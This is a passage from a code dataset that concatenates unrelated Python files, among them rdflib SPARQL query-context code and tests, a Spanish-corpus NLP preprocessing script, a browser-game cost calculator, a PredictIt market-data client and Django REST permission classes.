return FrozenBindings(self.ctx, (x for x in self.items() if x[0] in vars))
def merge(self, other: t.Mapping[Identifier, Identifier]) -> "FrozenBindings":
res = FrozenBindings(self.ctx, itertools.chain(self.items(), other.items()))
return res
@property
def now(self) -> datetime.datetime:
return self.ctx.now
@property
def bnodes(self) -> t.Mapping[Identifier, BNode]:
return self.ctx.bnodes
@property
def prologue(self) -> Optional["Prologue"]:
return self.ctx.prologue
def forget(
self, before: "QueryContext", _except: Optional[Container[Variable]] = None
):
"""
return a frozen dict only of bindings made in self
since before
"""
if not _except:
_except = []
        # bindings from initBindings are never forgotten
return FrozenBindings(
self.ctx,
(
x
for x in self.items()
if (
x[0] in _except
# type error: Unsupported right operand type for in ("Optional[Dict[Variable, Identifier]]")
or x[0] in self.ctx.initBindings # type: ignore[operator]
or before[x[0]] is None
)
),
)
def remember(self, these):
"""
return a frozen dict only of bindings in these
"""
return FrozenBindings(self.ctx, (x for x in self.items() if x[0] in these))
class QueryContext(object):
"""
Query context - passed along when evaluating the query
"""
def __init__(
self,
graph: Optional[Graph] = None,
bindings: Optional[Union[Bindings, FrozenBindings, List[Any]]] = None,
initBindings: Optional[Dict[Variable, Identifier]] = None,
):
self.initBindings = initBindings
self.bindings = Bindings(d=bindings or [])
if initBindings:
self.bindings.update(initBindings)
self.graph: Optional[Graph]
self._dataset: Optional[ConjunctiveGraph]
if isinstance(graph, ConjunctiveGraph):
self._dataset = graph
if rdflib.plugins.sparql.SPARQL_DEFAULT_GRAPH_UNION:
self.graph = self.dataset
else:
self.graph = self.dataset.default_context
else:
self._dataset = None
self.graph = graph
self.prologue: Optional[Prologue] = None
self._now: Optional[datetime.datetime] = None
self.bnodes: t.MutableMapping[Identifier, BNode] = collections.defaultdict(
BNode
)
@property
def now(self) -> datetime.datetime:
if self._now is None:
self._now = datetime.datetime.now(isodate.tzinfo.UTC)
return self._now
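    # Added note: SPARQL requires NOW() to return the same instant for the
    # whole query execution, which is why the timestamp is computed lazily
    # once and then memoized above.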
def clone(
self, bindings: Optional[Union[FrozenBindings, Bindings, List[Any]]] = None
) -> "QueryContext":
r = QueryContext(
self._dataset if self._dataset is not None else self.graph,
bindings or self.bindings,
initBindings=self.initBindings,
)
r.prologue = self.prologue
r.graph = self.graph
r.bnodes = self.bnodes
return r
@property
    def dataset(self) -> ConjunctiveGraph:
        """current dataset"""
if self._dataset is None:
raise Exception(
"You performed a query operation requiring "
+ "a dataset (i.e. ConjunctiveGraph), but "
+ "operating currently on a single graph."
)
return self._dataset
def load(self, source: URIRef, default: bool = False, **kwargs):
def _load(graph, source):
try:
return graph.parse(source, format="turtle", **kwargs)
except Exception:
pass
try:
return graph.parse(source, format="xml", **kwargs)
except Exception:
pass
try:
return graph.parse(source, format="n3", **kwargs)
except Exception:
pass
try:
return graph.parse(source, format="nt", **kwargs)
except Exception:
raise Exception(
"Could not load %s as either RDF/XML, N3 or NTriples" % source
)
if not rdflib.plugins.sparql.SPARQL_LOAD_GRAPHS:
# we are not loading - if we already know the graph
# being "loaded", just add it to the default-graph
if default:
# Unsupported left operand type for + ("None")
self.graph += self.dataset.get_context(source) # type: ignore[operator]
else:
if default:
_load(self.graph, source)
else:
_load(self.dataset, source)
def __getitem__(self, key) -> Any:
# in SPARQL BNodes are just labels
if not isinstance(key, (BNode, Variable)):
return key
try:
return self.bindings[key]
except KeyError:
return None
def get(self, key: Variable, default: Optional[Any] = None):
try:
return self[key]
except KeyError:
return default
def solution(self, vars: Optional[Iterable[Variable]] = None) -> FrozenBindings:
"""
Return a static copy of the current variable bindings as dict
"""
if vars:
return FrozenBindings(
self, ((k, v) for k, v in self.bindings.items() if k in vars)
)
else:
return FrozenBindings(self, self.bindings.items())
def __setitem__(self, key: Identifier, value: Identifier) -> None:
if key in self.bindings and self.bindings[key] != value:
raise AlreadyBound()
self.bindings[key] = value
def pushGraph(self, graph: Optional[Graph]) -> "QueryContext":
r = self.clone()
r.graph = graph
return r
def push(self) -> "QueryContext":
r = self.clone(Bindings(self.bindings))
return r
def clean(self) -> "QueryContext":
return self.clone([])
def thaw(self, frozenbindings: FrozenBindings) -> "QueryContext":
"""
Create a new read/write query context from the given solution
"""
c = self.clone(frozenbindings)
return c
class Prologue:
"""
A class for holding prefixing bindings and base URI information
"""
def __init__(self):
self.base: Optional[str] = None
self.namespace_manager = NamespaceManager(Graph()) # ns man needs a store
def resolvePName(self, prefix: Optional[str], localname: Optional[str]) -> URIRef:
ns = self.namespace_manager.store.namespace(prefix or "")
if ns is None:
raise Exception("Unknown namespace prefix : %s" % prefix)
return URIRef(ns + (localname or ""))
def bind(self, prefix: Optional[str], uri: Any) -> None:
self.namespace_manager.bind(prefix, uri, replace=True)
def absolutize(
self, iri: Optional[Union[CompValue, str]]
) -> Optional[Union[CompValue, str]]:
"""
Apply BASE / PREFIXes to URIs
(and to datatypes in Literals)
TODO: Move resolving URIs to pre-processing
"""
if isinstance(iri, CompValue):
if iri.name == "pname":
return self.resolvePName(iri.prefix, iri.localname)
if iri.name == "literal":
# type error: Argument "datatype" to "Literal" has incompatible type "Union[CompValue, Identifier, None]"; expected "Optional[str]"
return Literal(
iri.string, lang=iri.lang, datatype=self.absolutize(iri.datatype) # type: ignore[arg-type]
)
        elif isinstance(iri, URIRef) and ":" not in iri:
return URIRef(iri, base=self.base)
return iri
class Query:
"""
A parsed and translated query
"""
def __init__(self, prologue: Prologue, algebra: CompValue):
self.prologue = prologue
self.algebra = algebra
self._original_args: Tuple[str, Mapping[str, str], Optional[str]]
class Update:
"""
A parsed and translated update
"""
def __init__(self, prologue: Prologue, algebra: List[CompValue]):
self.prologue = prologue
self.algebra = algebra
self._original_args: Tuple[str, Mapping[str, str], Optional[str]]
```
#### File: rdflib/test/conftest.py
```python
import pytest
pytest.register_assert_rewrite("test.utils")
from rdflib import Graph
from .data import TEST_DATA_DIR
from .utils.earl import EarlReporter
pytest_plugins = [EarlReporter.__module__]
# This is here so that asserts from these modules are formatted for human
# readability.
@pytest.fixture(scope="session")
def rdfs_graph() -> Graph:
return Graph().parse(TEST_DATA_DIR / "defined_namespaces/rdfs.ttl", format="turtle")
```
#### File: test/jsonld/runner.py
```python
import json
from rdflib import ConjunctiveGraph
from rdflib.compare import isomorphic
from rdflib.parser import InputSource
from rdflib.plugins.parsers.jsonld import JsonLDParser, to_rdf
# monkey-patch the N-Quads parser via its underlying W3CNTriplesParser to keep source bnode ids ..
from rdflib.plugins.parsers.ntriples import W3CNTriplesParser, bNode, r_nodeid
from rdflib.plugins.serializers.jsonld import from_rdf
from rdflib.plugins.shared.jsonld.keys import CONTEXT, GRAPH
def _preserving_nodeid(self, bnode_context=None):
if not self.peek("_"):
return False
return bNode(self.eat(r_nodeid).group(1))
DEFAULT_PARSER_VERSION = 1.0
def make_fake_urlinputsource(input_uri, format=None, suite_base=None, options=None):
local_url = input_uri.replace("https://w3c.github.io/json-ld-api/tests/", "./")
try:
f = open(local_url, "rb")
except FileNotFoundError:
f = None
source = InputSource(input_uri)
source.setPublicId(input_uri)
source.setByteStream(f)
source.url = input_uri
source.links = []
if local_url.endswith((".jsonld", ".jldt")):
source.content_type = "application/ld+json"
else:
source.content_type = "application/json"
source.format = format
if options:
if "httpLink" in options:
source.links.append(options["httpLink"])
if "contentType" in options:
source.content_type = options["contentType"]
if "redirectTo" in options:
redir = suite_base + options["redirectTo"]
local_redirect = redir.replace(
"https://w3c.github.io/json-ld-api/tests/", "./"
)
if f:
f.close()
try:
f = open(local_redirect, "rb")
except FileNotFoundError:
f = None
source.setByteStream(f)
source.url = redir
source.setPublicId(redir)
source.setSystemId(redir)
return source
def do_test_json(suite_base, cat, num, inputpath, expectedpath, context, options):
input_uri = suite_base + inputpath
input_graph = ConjunctiveGraph()
if cat == "remote-doc":
input_src = make_fake_urlinputsource(
input_uri, format="json-ld", suite_base=suite_base, options=options
)
p = JsonLDParser()
p.parse(
input_src,
input_graph,
base=input_src.getPublicId(),
context_data=context,
generalized_rdf=True,
)
else:
input_obj = _load_json(inputpath)
to_rdf(
input_obj,
input_graph,
base=input_uri,
context_data=context,
generalized_rdf=True,
)
expected_json = _load_json(expectedpath)
use_native_types = True # CONTEXT in input_obj
result_json = from_rdf(
input_graph,
context,
base="./", # deliberately set base different to the input base
use_native_types=options.get("useNativeTypes", use_native_types),
use_rdf_type=options.get("useRdfType", False),
)
def _prune_json(data):
if CONTEXT in data:
data.pop(CONTEXT)
if GRAPH in data:
data = data[GRAPH]
# def _remove_empty_sets(obj):
return data
expected_json = _prune_json(expected_json)
result_json = _prune_json(result_json)
_compare_json(expected_json, result_json)
def do_test_parser(suite_base, cat, num, inputpath, expectedpath, context, options):
input_uri = suite_base + inputpath
input_obj = _load_json(inputpath)
old_nodeid = W3CNTriplesParser.nodeid
# monkey patch nodeid fn in NTriplesParser
W3CNTriplesParser.nodeid = _preserving_nodeid
try:
expected_graph = _load_nquads(expectedpath)
finally:
W3CNTriplesParser.nodeid = old_nodeid
result_graph = ConjunctiveGraph()
requested_version = options.get("specVersion")
version = DEFAULT_PARSER_VERSION
if requested_version:
if requested_version == "json-ld-1.1":
version = 1.1
elif requested_version == "json-ld-1.0":
version = 1.0
if cat == "remote-doc":
input_src = make_fake_urlinputsource(
input_uri, format="json-ld", options=options
)
p = JsonLDParser()
p.parse(
input_src,
result_graph,
base=input_uri,
context_data=context,
generalized_rdf=True,
)
else:
to_rdf(
input_obj,
result_graph,
context_data=context,
base=options.get("base", input_uri),
version=version,
generalized_rdf=options.get("produceGeneralizedRdf", False),
)
assert isomorphic(result_graph, expected_graph), "Expected:\n%s\nGot:\n%s" % (
expected_graph.serialize(),
result_graph.serialize(),
)
def do_test_serializer(suite_base, cat, num, inputpath, expectedpath, context, options):
input_uri = suite_base + inputpath
old_nodeid = W3CNTriplesParser.nodeid
# monkey patch nodeid fn in NTriplesParser
W3CNTriplesParser.nodeid = _preserving_nodeid
try:
input_graph = _load_nquads(inputpath)
finally:
W3CNTriplesParser.nodeid = old_nodeid
expected_json = _load_json(expectedpath)
result_json = from_rdf(
input_graph,
context,
base=input_uri,
use_native_types=options.get("useNativeTypes", False),
use_rdf_type=options.get("useRdfType", False),
)
_compare_json(expected_json, result_json)
def _load_nquads(source):
graph = ConjunctiveGraph()
with open(source) as f:
data = f.read()
graph.parse(data=data, format="nquads")
return graph
def _load_json(source):
with open(source) as f:
return json.load(f)
def _to_ordered(obj):
if isinstance(obj, list):
# NOTE: use type in key to handle mixed
# lists of e.g. bool, int, float.
return sorted(
(_to_ordered(lv) for lv in obj),
key=lambda x: (_ord_key(x), type(x).__name__),
)
if not isinstance(obj, dict):
return obj
return sorted((k, _to_ordered(v)) for k, v in obj.items())
def _ord_key(x):
if isinstance(x, dict) and "@id" in x:
return x["@id"]
else:
return x
def _dump_json(obj):
return json.dumps(
obj, indent=4, separators=(",", ": "), sort_keys=True, check_circular=True
)
def _compare_json(expected, result):
expected = json.loads(_dump_json(expected))
result = json.loads(_dump_json(result))
assert _to_ordered(expected) == _to_ordered(
result
), "Expected JSON:\n%s\nGot:\n%s" % (_dump_json(expected), _dump_json(result))
```
#### File: test/test_graph/test_slice.py
```python
from test.data import bob, cheese, hates, likes, michel, pizza, tarek
from rdflib import Graph
class TestGraphSlice:
def test_slice(self):
"""
We pervert the slice object,
and use start, stop, step as subject, predicate, object
all operations return generators over full triples
"""
def sl(x, y):
return len(list(x)) == y
def soe(x, y):
return set([a[2] for a in x]) == set(y) # equals objects
g = Graph()
g.add((tarek, likes, pizza))
g.add((tarek, likes, cheese))
g.add((michel, likes, pizza))
g.add((michel, likes, cheese))
g.add((bob, likes, cheese))
g.add((bob, hates, pizza))
g.add((bob, hates, michel)) # gasp!
# Single terms are all trivial:
# single index slices by subject, i.e. return triples((x,None,None))
# tell me everything about "tarek"
        assert sl(g[tarek], 2)
# single slice slices by s,p,o, with : used to split
# tell me everything about "tarek" (same as above)
        assert sl(g[tarek::], 2)
# give me every "likes" relationship
        assert sl(g[:likes:], 5)
# give me every relationship to pizza
        assert sl(g[::pizza], 3)
# give me everyone who likes pizza
        assert sl(g[:likes:pizza], 2)
# does tarek like pizza?
assert g[tarek:likes:pizza] is True
        # More interesting is using paths
# everything hated or liked
        assert sl(g[: hates | likes], 7)
```
#### File: test/test_parsers/test_broken_parse_data_from_jena.py
```python
import os
from test.data import TEST_DATA_DIR
import pytest
import rdflib
# Recovered from
# https://github.com/RDFLib/rdflib/tree/6b4607018ebf589da74aea4c25408999f1acf2e2
broken_parse_data = os.path.join(TEST_DATA_DIR, "broken_parse_test")
@pytest.fixture
def xfail_broken_parse_data(request):
fname = request.getfixturevalue("testfile")
expected_failures = [
"n3-writer-test-02.n3",
"n3-writer-test-25.n3",
"rdf-test-01.n3",
"rdf-test-08.n3",
"rdf-test-10.n3",
"rdf-test-24.n3",
]
if fname in expected_failures:
request.node.add_marker(
pytest.mark.xfail(reason=f"Expected failure with {fname}")
)
@pytest.mark.parametrize("testfile", os.listdir(broken_parse_data))
@pytest.mark.usefixtures("xfail_broken_parse_data")
def test_n3_serializer_roundtrip(testfile) -> None:
g1 = rdflib.ConjunctiveGraph()
g1.parse(os.path.join(broken_parse_data, testfile), format="n3")
```
#### File: test/test_w3c_spec/test_nt_w3c.py
```python
import os
from test.data import TEST_DATA_DIR
from test.utils.manifest import RDFTest, read_manifest
from test.utils.namespace import RDFT
from typing import Callable, Dict
import pytest
from rdflib import Graph
from rdflib.term import Node, URIRef
verbose = False
def nt(test):
    g = Graph()
    try:
        g.parse(test.action, format="nt")
    except Exception:
        # a parse failure is only acceptable for negative-syntax tests
        if test.syntax:
            raise
    else:
        if not test.syntax:
            raise AssertionError("Input shouldn't have parsed!")
testers: Dict[Node, Callable[[RDFTest], None]] = {
RDFT.TestNTriplesPositiveSyntax: nt,
RDFT.TestNTriplesNegativeSyntax: nt,
}
@pytest.mark.parametrize(
"rdf_test_uri, type, rdf_test",
read_manifest(
os.path.join(TEST_DATA_DIR, "suites", "w3c/ntriples/manifest.ttl"), legacy=True
),
)
def test_manifest(rdf_test_uri: URIRef, type: Node, rdf_test: RDFTest):
testers[type](rdf_test)
``` |
{
"source": "jjonusas/Zapatista-discourse-nlp",
"score": 3
} |
#### File: src/data/make_dataset.py
```python
import os
import re
import pandas
import numpy
import spacy
import click
import logging
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
from gensim.models.phrases import Phrases, Phraser
class RawCorpusIter:
""" An iterator of a raw corpus.
The iterator assumes that the raw corpus is a directory with every document
represented as a separate file within.
Args:
path_to_corpus (str): path to the directory containing the corpus
Returns:
iterator: when iterated this iterator returns a pair containing the name of
the file and the content of the file
"""
def __init__(self, path_to_corpus, info_freq = 10):
self.corpus_dir = path_to_corpus
self.files = os.listdir(self.corpus_dir)
self.logger = logging.getLogger(__name__)
self.info_freq = info_freq
def __iter__(self):
self.file_num = 0
return self
def __next__(self):
if self.file_num < len(self.files):
n = self.file_num
self.file_num += 1
with open(os.path.join(self.corpus_dir, self.files[n]), "r") as file:
if self.file_num % self.info_freq == 0:
                    self.logger.info(f"PROGRESS: processing file {self.file_num} of {len(self.files)}")
return(self.files[n], file.read())
else:
raise StopIteration
def convert_raw_corpus_to_df(path_to_corpus, clean = False):
""" Converts a raw corpus to a pandas dataframe.
The function assumes that the raw corpus is a directory with every document
represented as a separate file within. It returns a dataframe in which
every row corresponds to a single sentence in the corpus. The dataframe
contains columns 'document_index' and 'sentence_index' to uniquely identify
each sentence, as well as the column 'date' which corresponds to the date
when the document was published. If the flag <clean> is set to true, the sentences
in the data frame
Args:
path_to_corpus (str): path to the directory containing the corpus
clean (bool): flag whether to clean the sentence
Returns:
pandas.DataFrame: containing the corpus subdivided into sentences
"""
logger = logging.getLogger(__name__)
def is_accepted(token):
output = token.is_punct
output |= token.is_space
output |= token.is_stop
return not output
corpus = RawCorpusIter(path_to_corpus)
nlp = spacy.load("es_dep_news_trf", disable=['ner'])
raw_sentences = []
cleaned_sentences = []
sentence_indices = []
document_indices = []
dates = []
for document_id, (date, text) in enumerate(corpus):
        # In the Zapatista corpus a hyphen is often used to indicate
        # speech instead of an en-dash, but spacy does not recognise it as
        # punctuation. Replace a hyphen at the start of a sentence with an en-dash.
        text = re.sub(r'^-', '–', text)
        text = re.sub(r'(\s)-', r'\g<1>–', text)
doc = nlp(text)
sentence_index = 0
for sentence in doc.sents:
raw_sentence = sentence.text.strip()
if raw_sentence != "":
raw_sentences.append(raw_sentence)
sentence_indices.append(sentence_index)
sentence_index+=1
if clean:
filtered_words = [token.lemma_.lower() for token in sentence if is_accepted(token)]
cleaned_sentences.append(" ".join(filtered_words))
document_indices += [document_id] * sentence_index
dates += [pandas.to_datetime(date[:10])] * sentence_index
if clean:
df = pandas.DataFrame({'date':dates,
'document_index': document_indices,
'sentence_index': sentence_indices,
'raw_sentence': raw_sentences,
'cleaned_sentence': cleaned_sentences })
    else:
        df = pandas.DataFrame({'date': dates,
                               'document_index': document_indices,
                               'sentence_index': sentence_indices,
                               'raw_sentence': raw_sentences})
size = len(df)
df = df[(df != '').all(1)]
logger.info(f'{size - len(df)} sentences were removed during cleaning')
return df
def combine_phrases_in_corpus(corpus_df, column, min_count=75, n = 1):
""" Use gensim phrases to find phrases in the corpus.
Args:
corpus_df (pandas.DataFrame): the input corpus
column (str): the name of the column to be processed
min_count (int): min_count hyperparameter of gensim module
"""
logger = logging.getLogger(__name__)
try:
sentences = [sent.split() for sent in corpus_df[column]]
except KeyError:
logger.error(f"{column} is not a name of a column of the input dataframe")
for i in range(n):
phrases_model = Phrases(sentences, min_count=min_count, progress_per=10000)
sentences = phrases_model[sentences]
sentences_with_phrases = [" ".join(sent) for sent in sentences]
corpus_df[column + "_with_phrases"] = sentences_with_phrases
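# Illustrative note (added): tokens that Phrases scores above min_count are
# joined with an underscore in the new '<column>_with_phrases' column, so a
# frequent pair (hypothetically, "ejercito zapatista") would surface as the
# single token "ejercito_zapatista".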
@click.command()
@click.argument('input_filepath', type=click.Path(exists=True))
@click.argument('output_filepath', type=click.Path())
@click.option('--clean/--no-clean', default=False, help="Make the sentences lower case and remove punctuation")
@click.option('--phrases/--no-phrases', default=False, help="Combine commonly used phrases into a single token")
@click.option('--min_count', default=75, help="Min_count hyperparameter for gensim Phrases")
@click.option('--n', default=1, help="The number of times bigrams are obtained")
def main(input_filepath, output_filepath, clean, phrases, min_count, n):
""" Runs data processing scripts to turn raw data from (../raw) into
cleaned data ready to be analyzed (saved in ../processed).
"""
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# console handler for logging
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# file handler for logging
file_handler = logging.FileHandler(output_filepath + ".log", encoding='utf-8')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.info('converting the raw data into a dataframe')
    logger.info(f'raw data: {input_filepath}, clean: {clean}, detect phrases: {phrases}, min_count: {min_count}, bigram iterations: {n}')
df = convert_raw_corpus_to_df(input_filepath, clean)
if clean and phrases:
logger.info('combining phrases into tokens')
combine_phrases_in_corpus(df, 'cleaned_sentence',min_count = min_count, n = n)
df.to_csv(output_filepath, index=False)
if __name__ == '__main__':
# not used in this stub but often useful for finding various files
project_dir = Path(__file__).resolve().parents[2]
# find .env automagically by walking up directories until it's found, then
# load up the .env entries as environment variables
load_dotenv(find_dotenv())
main()
``` |
{
"source": "jjoo914/rival_regions_calc",
"score": 3
} |
#### File: rival_regions_calc/rival_regions_calc/construction_costs.py
```python
from . import Building
class ConstructionCosts():
"""Calculate resources needed to raise building levels in region"""
building = 0
current = 0
cash = 0
oil = 0
ore = 0
gold = 0
uranium = 0
diamond = 0
def __init__(self, building, current):
"""Initialize WorkProduction"""
if not isinstance(building, Building) or not isinstance(current, int):
raise TypeError
self.building = building
self.current = current
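    # Added note: each new level i costs round((i * base_rate) ** exponent) per
    # resource -- exponent 1.5 for most resources, 0.7 for diamond in several
    # branches, and 1 where the base rate is zero; calculate() below sums these
    # costs over levels current+1 .. current+build_plus.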
def calculate(self, build_plus):
"""Calculate resources you need based on new buildings"""
if not isinstance(build_plus, int):
raise TypeError
build_total = self.current + build_plus
building_id = self.building.building_id
if building_id in (1, 2, 3):
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 300, 1.5))
self.oil += round(pow(i * 160, 1.5))
self.ore += round(pow(i * 90, 1.5))
self.gold += round(pow(i * 2160, 1.5))
self.diamond += round(pow(i * 0, 1.5))
self.uranium += round(pow(i * 0, 1))
elif building_id in (4, 5, 8):
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 1000, 1.5))
self.oil += round(pow(i * 10, 1.5))
self.ore += round(pow(i * 10, 1.5))
self.gold += round(pow(i * 180, 1.5))
self.diamond += round(pow(i * 10, 0.7))
self.uranium += round(pow(i * 0, 1))
elif self.building.building_id == 6:
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 2000, 1.5))
self.gold += round(pow(i * 90, 1.5))
self.oil += round(pow(i * 25, 1.5))
self.ore += round(pow(i * 25, 1.5))
self.diamond += round(pow(i * 5, 0.7))
self.uranium += round(pow(i * 20, 1.5))
elif self.building.building_id == 7:
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 6000, 1.5))
self.gold += round(pow(i * 180, 1.5))
self.oil += round(pow(i * 30, 1.5))
self.ore += round(pow(i * 25, 1.5))
self.diamond += round(pow(i * 10, 0.7))
self.uranium += round(pow(i * 30, 1.5))
elif self.building.building_id == 9:
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 30, 1.5))
self.gold += round(pow(i * 216, 1.5))
self.oil += round(pow(i * 16, 1.5))
self.ore += round(pow(i * 9, 1.5))
self.diamond += round(pow(i * 0, 1.5))
self.uranium += round(pow(i * 0, 1))
```
#### File: rival_regions_calc/rival_regions_calc/item.py
```python
class Item():
"""Represents an item in Rival Regions"""
item_id = None
name = None
def __init__(self, item):
"""Initialize Resource"""
if isinstance(item, str):
self.item_id = self.items[item]
self.name = item
elif isinstance(item, int):
self.name = self.items_inverse[item]
self.item_id = item
items = {
"cash": 0,
"oil": 2,
"ore": 5,
"gold": 6,
"uranium": 11,
"diamond": 15,
"liquid oxygen": 21,
"helium": 24,
}
items_inverse = {
0: "cash",
2: "oil",
5: "ore",
6: "gold",
11: "uranium",
15: "diamond",
21: "liquid oxygen",
24: "helium",
}
resource_max = {
2: 371,
5: 356,
6: 637,
11: 25,
15: 27,
}
def get_max(self):
"""return max for resource"""
return self.resource_max[self.item_id]
```
#### File: rival_regions_calc/rival_regions_calc/resource_coefficient.py
```python
from . import Item
class ResourceCoefficient():
"""Calculate resource coefficient in working formula"""
resource = None
limit = 0
def calculate(self):
"""Calculate the coefficient"""
return pow(self.limit * self.resource_koef() / 10, 0.8)
def __init__(self, resource, limit):
"""Initialize ResourceCoefficient"""
if not isinstance(resource, Item) or not isinstance(limit, int):
raise TypeError
self.resource = resource
self.limit = limit
def resource_koef(self):
"""Calculate coefficient for resource"""
if self.resource.item_id == 2 or self.resource.item_id == 5:
return 0.65
if self.resource.item_id == 6:
return 0.4
if self.resource.item_id == 11 or self.resource.item_id == 15:
return 0.75
if self.resource.item_id == 21 or self.resource.item_id == 24:
return 0.4
return 0
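    # Worked example (added): for oil (item_id 2) with limit 371 the
    # coefficient is (371 * 0.65 / 10) ** 0.8 = 24.115 ** 0.8 ≈ 12.8.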
```
#### File: rival_regions_calc/tests/test_construction_costs.py
```python
from rival_regions_calc import ConstructionCosts, Building
BUILDING = Building("hospital")
CC = ConstructionCosts(BUILDING, 1805)
CC.calculate(50)
def bucks(integer):
"""Format number"""
return '{:,}'.format(integer).replace(',', '.')
print('%17s $' % bucks(CC.cash))
print('%17s G' % bucks(CC.gold))
print('%17s bbl' % bucks(CC.oil))
print('%17s kg' % bucks(CC.ore))
print('%17s pcs.' % bucks(CC.diamond))
print('%17s g' % bucks(CC.uranium))
```
#### File: rival_regions_calc/tests/test_deep_exploration.py
```python
from rival_regions_calc import Item, DeepExploration
resource = Item("oil")
DE = DeepExploration(resource, 223)
DE.calculate_max()
def bucks(integer):
"""Format number"""
return '{:,}'.format(integer).replace(',', '.')
print('%17s $' % bucks(DE.cash))
print('%17s G' % bucks(DE.gold))
print('%17s pcs.' % bucks(DE.diamond))
``` |
{
"source": "jj-ookla/datamechanics_airflow_plugin",
"score": 3
} |
#### File: datamechanics_airflow_plugin/datamechanics_airflow_plugin/application_state.py
```python
from enum import Enum
class SimplifiedApplicationStateType(Enum):
PendingState = "PENDING"
RunningState = "RUNNING"
CompletedState = "COMPLETED"
FailedState = "FAILED"
@property
def is_terminal(self) -> bool:
return self in [
SimplifiedApplicationStateType.CompletedState,
SimplifiedApplicationStateType.FailedState,
]
@property
def is_successful(self) -> bool:
return self == SimplifiedApplicationStateType.CompletedState
class ApplicationStateType(Enum):
NewState = ""
SubmittedState = "SUBMITTED"
RunningState = "RUNNING"
CompletedState = "COMPLETED"
FailedState = "FAILED"
FailedSubmissionState = "SUBMISSION_FAILED"
PendingRerunState = "PENDING_RERUN"
InvalidatingState = "INVALIDATING"
SucceedingState = "SUCCEEDING"
FailingState = "FAILING"
UnknownState = "UNKNOWN"
@property
def simplified(self) -> SimplifiedApplicationStateType:
return _state_mapping[self]
_state_mapping = {
ApplicationStateType.NewState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.SubmittedState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.PendingRerunState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.UnknownState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.RunningState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.InvalidatingState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.SucceedingState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.FailingState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.CompletedState: SimplifiedApplicationStateType.CompletedState,
ApplicationStateType.FailedState: SimplifiedApplicationStateType.FailedState,
ApplicationStateType.FailedSubmissionState: SimplifiedApplicationStateType.FailedState,
}
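# Hedged usage sketch (added; only names defined in this module are used):
def _demo_state_mapping() -> bool:
    """Map a raw driver state to its simplified form and check terminality."""
    state = ApplicationStateType.FailingState
    # FAILING simplifies to RUNNING, which is not a terminal state yet.
    return state.simplified.is_terminal  # False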
``` |
{
"source": "jjordanbaird/predictit-data",
"score": 3
} |
#### File: predictit-data/predictit_data/predictit.py
```python
import requests
import time
class Predictit():
def __init__(self):
self.pull_data()
self.get_ids()
def _fetch_data(self):
url = 'https://www.predictit.org/api/marketdata/all/'
self.last_pull_time = time.time()
return requests.get(url).json()['markets']
def pull_data(self, ignore_time=False):
if hasattr(self, 'last_pull_time'):
if ignore_time:
self.data = self._fetch_data()
else:
current_time = time.time()
elapsed = current_time - self.last_pull_time
if elapsed >= 60:
                    print('%.0f seconds elapsed since last data pull' % elapsed)
print('Pulling fresh data..')
self.data = self._fetch_data()
print('Fresh data collected at %s' % (time.strftime("%H:%M:%S", time.localtime(current_time))))
else:
self.data = self._fetch_data()
def get_ids(self):
self.ids = []
self.parent_ids = []
for parent_market in self.data:
self.parent_ids.append(parent_market['id'])
for sub_market in parent_market['contracts']:
self.ids.append(sub_market['id'])
def get_data_by_id(self, market_id, greedy=False):
# all contracts will return if market_id is a parent market id
if market_id in self.parent_ids:
for market in self.data:
if market['id'] == market_id:
return market
else:
# if market_id is a contract id, only that contract data will return
for parent_market in self.data:
if type(parent_market['contracts']) is dict: # (then only 1 contract available)
if parent_market['contracts']['id'] == market_id:
market = parent_market['contracts']
return market
else:
pass
else:
for sub_contract in parent_market['contracts']:
if sub_contract['id'] == market_id:
if not greedy:
market = parent_market
else:
market = sub_contract
return market
def list_sub_markets(self):
d = {}
for parent_market in self.data:
if type(parent_market['contracts']) is dict:
d[parent_market['contracts']['id']] = parent_market['contracts']['name']
else:
for sub_market in parent_market['contracts']:
d[sub_market['id']] = sub_market['name']
return d
def list_parent_markets(self):
d = {}
for parent_market in self.data:
d[parent_market['id']] = parent_market['name']
return d
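# Hedged usage sketch (added for illustration; constructing the client issues a
# live HTTP request to the PredictIt API):
def _demo_predictit():
    client = Predictit()                    # pulls all market data once
    parents = client.list_parent_markets()  # {parent_id: market name}
    some_id = next(iter(parents))
    return client.get_data_by_id(some_id)   # full dict for that parent market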
``` |
{
"source": "jjordanzlatanov/temperatures",
"score": 3
} |
#### File: jjordanzlatanov/temperatures/main.py
```python
import requests
temperatures = []
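# Added note: the helpers below assume the API returns exactly five readings,
# so after sorting, indices 0, 2 and 4 hold the minimum, median and maximum.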
def mintemp():
return temperatures[0]
def mediumtemp():
return temperatures[2]
def maxtemp():
return temperatures[4]
data = requests.post('https://tues2022.proxy.beeceptor.com/my/api/test')
for i in data.json()['data']:
temp = i['temperature']
temperatures.append(temp)
temperatures.sort()
``` |
{
"source": "JJorgeDSIC/DRF_Experiments",
"score": 3
} |
#### File: djangorest/api/permissions.py
```python
from rest_framework.permissions import BasePermission
from .models import Recommendation, Profile
class IsOwner(BasePermission):
"""Custom permission class to allow only recommendation owners to edit them."""
def has_object_permission(self, request, view, obj):
"""Return True if permission is granted to the recommendation owner."""
if isinstance(obj, Recommendation):
print(obj.owner)
print(type(obj.owner))
print(request.user)
print(type(request.user))
print(obj.owner == request.user)
return obj.owner == request.user
return obj.owner == request.user
class IsIdentifiedUser(BasePermission):
    """Custom permission class to allow only the profile's own user to edit it."""
    def has_object_permission(self, request, view, obj):
        """Return True if permission is granted to the profile's user."""
if isinstance(obj, Profile):
print(obj.user)
print(type(obj.user))
print(request.user)
print(type(request.user))
print(obj.user == request.user)
return obj.user == request.user
